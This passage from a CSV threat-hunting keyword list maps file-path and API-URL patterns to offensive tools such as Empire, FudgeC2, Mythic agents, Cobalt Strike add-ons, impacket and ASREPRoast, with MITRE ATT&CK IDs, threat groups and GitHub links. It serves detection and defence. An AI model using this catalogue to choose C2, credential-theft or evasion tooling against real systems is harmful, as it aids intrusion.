T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,1,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*/api/stagers?token=*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,1,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*/api/users/1/disable?token=*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,1,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*/api/v1/campaign/*/implants/*,offensive_tool_keyword,FudgeC2,FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.,T1021.002 - T1105 - T1059.001 - T1059.003,TA0008 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/Ziconius/FudgeC2,1,1,N/A,10,10,237,54,2023-05-01T21:13:56Z,2018-09-09T21:05:21Z -*/api/v1/implants/*/execute*,offensive_tool_keyword,FudgeC2,FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.,T1021.002 - T1105 - T1059.001 - T1059.003,TA0008 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/Ziconius/FudgeC2,1,1,N/A,10,10,237,54,2023-05-01T21:13:56Z,2018-09-09T21:05:21Z -*/api/v1/implants/*/responses*,offensive_tool_keyword,FudgeC2,FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.,T1021.002 - T1105 - T1059.001 - T1059.003,TA0008 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/Ziconius/FudgeC2,1,1,N/A,10,10,237,54,2023-05-01T21:13:56Z,2018-09-09T21:05:21Z -*/api/v2/starkiller*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,1,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*/api0cradle/CVE-*,offensive_tool_keyword,POC,CVE-2023-23397 POC Powershell exploit,T1068 - T1557.001 - T1187 - T1212 -T1003.001 - T1550,TA0003 - TA0002 - TA0004,N/A,N/A,Exploitation tools,https://github.com/api0cradle/CVE-2023-23397-POC-Powershell,1,1,N/A,N/A,4,340,64,2023-03-17T07:47:40Z,2023-03-16T19:43:39Z -*/Apollo.exe*,offensive_tool_keyword,mythic,A .NET Framework 4.0 Windows Agent,T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Apollo/,1,1,N/A,10,10,401,83,2023-08-17T14:46:04Z,2020-11-09T08:05:16Z -*/Apollo.git*,offensive_tool_keyword,mythic,A .NET Framework 4.0 Windows Agent,T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Apollo/,1,1,N/A,10,10,401,83,2023-08-17T14:46:04Z,2020-11-09T08:05:16Z -*/Apollo/Agent/*,offensive_tool_keyword,mythic,A .NET Framework 4.0 Windows Agent,T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Apollo/,1,1,N/A,10,10,401,83,2023-08-17T14:46:04Z,2020-11-09T08:05:16Z -*/ApolloInterop.*,offensive_tool_keyword,mythic,A .NET Framework 4.0 Windows Agent,T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Apollo/,1,1,N/A,10,10,401,83,2023-08-17T14:46:04Z,2020-11-09T08:05:16Z -*/ApolloInterop/*,offensive_tool_keyword,mythic,A .NET Framework 4.0 Windows Agent,T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Apollo/,1,1,N/A,10,10,401,83,2023-08-17T14:46:04Z,2020-11-09T08:05:16Z -*/apollon-all-x64*,offensive_tool_keyword,apollon,evade auditd by writing /proc/PID/mem,T1054.001 - T1055.001 - T1012,TA0003 - TA0005,N/A,N/A,Defense Evasion,https://github.com/codewhitesec/apollon,1,1,N/A,8,1,13,5,2023-08-21T05:43:36Z,2023-07-31T11:55:43Z -*/apollon-main.zip*,offensive_tool_keyword,apollon,evade auditd by writing /proc/PID/mem,T1054.001 - T1055.001 - T1012,TA0003 - TA0005,N/A,N/A,Defense Evasion,https://github.com/codewhitesec/apollon,1,1,N/A,8,1,13,5,2023-08-21T05:43:36Z,2023-07-31T11:55:43Z -*/apollon-selective-x64*,offensive_tool_keyword,apollon,evade auditd by writing /proc/PID/mem,T1054.001 - T1055.001 - T1012,TA0003 - TA0005,N/A,N/A,Defense Evasion,https://github.com/codewhitesec/apollon,1,1,N/A,8,1,13,5,2023-08-21T05:43:36Z,2023-07-31T11:55:43Z -*/ApolloTest.exe,offensive_tool_keyword,mythic,A .NET Framework 4.0 Windows Agent,T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Apollo/,1,1,N/A,10,10,401,83,2023-08-17T14:46:04Z,2020-11-09T08:05:16Z -*/AppFiles/ipscan.exe*,greyware_tool_keyword,ipscan,Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors,T1046 - T1040 - T1018,TA0007 - TA0009,N/A,N/A,Network Exploitation tools,https://github.com/angryip/ipscan,1,0,N/A,7,10,3517,683,2023-09-11T16:36:25Z,2011-06-28T20:58:48Z -*/aquasecurity/cloudsploit*,offensive_tool_keyword,cloudsploit,CloudSploit by Aqua - Cloud Security Scans,T1526 - T1534 - T1547 - T1078 - T1046,TA0002 - TA0003 - TA0008,N/A,N/A,Exploitation tools,https://github.com/aquasecurity/cloudsploit,1,1,N/A,N/A,10,2921,641,2023-09-29T16:35:48Z,2015-06-29T15:33:40Z -*/Ares.git,offensive_tool_keyword,Ares,Python C2 botnet and backdoor ,T1105 - T1102 - T1055,TA0003 - TA0002 - TA0007,N/A,N/A,C2,https://github.com/sweetsoftware/Ares,1,1,N/A,10,10,1439,523,2023-03-02T12:43:09Z,2015-10-18T12:26:27Z -*/ares.py *,offensive_tool_keyword,Ares,Python C2 botnet and backdoor ,T1105 - T1102 - T1055,TA0003 - TA0002 - TA0007,N/A,N/A,C2,https://github.com/sweetsoftware/Ares,1,0,N/A,10,10,1439,523,2023-03-02T12:43:09Z,2015-10-18T12:26:27Z -*/armitage.git*,offensive_tool_keyword,armitage,Armitage is a graphical cyber attack management tool for Metasploit that visualizes your targets. recommends exploits and exposes the advanced capabilities of the framework ,T1210 - T1059.003 - T1547.001 - T1057 - T1046 - T1562.001 - T1071.001 - T1060 - T1573.002,TA0002 - TA0008 - TA0005 - TA0007 - TA0011,N/A,N/A,Exploitation tools,https://github.com/r00t0v3rr1d3/armitage,1,1,N/A,N/A,1,81,15,2022-12-06T00:17:23Z,2022-01-23T17:32:01Z -*/arp_scanner.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/arp_spoof/*,offensive_tool_keyword,bettercap,The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.,T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048,TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010,N/A,N/A,Network Exploitation tools,https://github.com/bettercap/bettercap,1,1,N/A,N/A,10,14623,1372,2023-09-18T15:43:34Z,2018-01-07T15:30:41Z -*/artifactor.py*,offensive_tool_keyword,cobaltstrike,This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Cobalt-Strike/sleep_python_bridge,1,1,N/A,10,10,158,33,2023-04-12T15:00:48Z,2021-10-12T18:18:48Z -*/ase_docker/*,offensive_tool_keyword,cobaltstrike,Rapid Attack Infrastructure (RAI),T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/obscuritylabs/RAI,1,1,N/A,10,10,283,53,2021-10-06T17:44:19Z,2018-02-12T16:23:23Z -*/asn-query.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/asprox.profile*,offensive_tool_keyword,cobaltstrike,Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rsmudge/Malleable-C2-Profiles,1,1,N/A,10,10,1362,429,2021-05-18T14:45:39Z,2014-07-14T15:02:42Z -*/asprox.profile*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Malleable C2 Design and Reference Guide,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/BC-SECURITY/Malleable-C2-Profiles,1,1,N/A,10,10,224,42,2023-06-11T17:38:36Z,2020-08-28T22:37:09Z -*/ASRenum.cpp*,offensive_tool_keyword,cobaltstrike,Cobalt Strike BOF that identifies Attack Surface Reduction (ASR) rules. actions. and exclusion locations,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/mlcsec/ASRenum-BOF,1,1,N/A,10,10,121,15,2022-12-28T17:27:18Z,2022-12-28T14:41:02Z -*/ASRenum.cs*,offensive_tool_keyword,cobaltstrike,Cobalt Strike BOF that identifies Attack Surface Reduction (ASR) rules. actions. and exclusion locations,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/mlcsec/ASRenum-BOF,1,1,N/A,10,10,121,15,2022-12-28T17:27:18Z,2022-12-28T14:41:02Z -*/ASRenum-BOF*,offensive_tool_keyword,cobaltstrike,Cobalt Strike BOF that identifies Attack Surface Reduction (ASR) rules. actions. and exclusion locations,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/mlcsec/ASRenum-BOF,1,1,N/A,10,10,121,15,2022-12-28T17:27:18Z,2022-12-28T14:41:02Z -*/ASREPRoast*,offensive_tool_keyword,ASREPRoast,Project that retrieves crackable hashes from KRB5 AS-REP responses for users without kerberoast preauthentication enabled. ,T1558.003,TA0006,N/A,N/A,Credential Access,https://github.com/HarmJ0y/ASREPRoast,1,1,N/A,N/A,2,180,57,2018-09-25T03:26:00Z,2017-01-14T21:07:57Z -*/asreproast_hashes_*.txt*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*/ASREProastables.txt*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*/assets/bin2uuids_file.py*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Shellcode Generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/RCStep/CSSG,1,1,N/A,10,10,554,107,2023-09-07T19:41:31Z,2021-01-12T14:39:06Z -*/asyncssh_server.py*,offensive_tool_keyword,MaccaroniC2,A proof-of-concept Command & Control framework that utilizes the powerful AsyncSSH Python library which provides an asynchronous client and server implementation of the SSHv2 protocol and use PyNgrok wrapper for ngrok integration.,T1090 - T1059.003,TA0011 - TA0002,N/A,N/A,C2,https://github.com/CalfCrusher/MaccaroniC2,1,1,N/A,10,10,57,9,2023-06-27T17:43:59Z,2023-05-21T13:33:48Z -*/atexec.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*/Athena-*.zip*,offensive_tool_keyword,mythic,Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Athena,1,1,N/A,10,10,137,32,2023-10-03T16:51:44Z,2022-01-24T20:44:38Z -*/Athena.csproj*,offensive_tool_keyword,mythic,Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Athena,1,1,N/A,10,10,137,32,2023-10-03T16:51:44Z,2022-01-24T20:44:38Z -*/Athena.exe*,offensive_tool_keyword,mythic,Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Athena,1,1,N/A,10,10,137,32,2023-10-03T16:51:44Z,2022-01-24T20:44:38Z -*/Athena.Profiles.*.cs*,offensive_tool_keyword,mythic,Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Athena,1,1,N/A,10,10,137,32,2023-10-03T16:51:44Z,2022-01-24T20:44:38Z -*/Athena.Profiles.*.exe*,offensive_tool_keyword,mythic,Athena is a 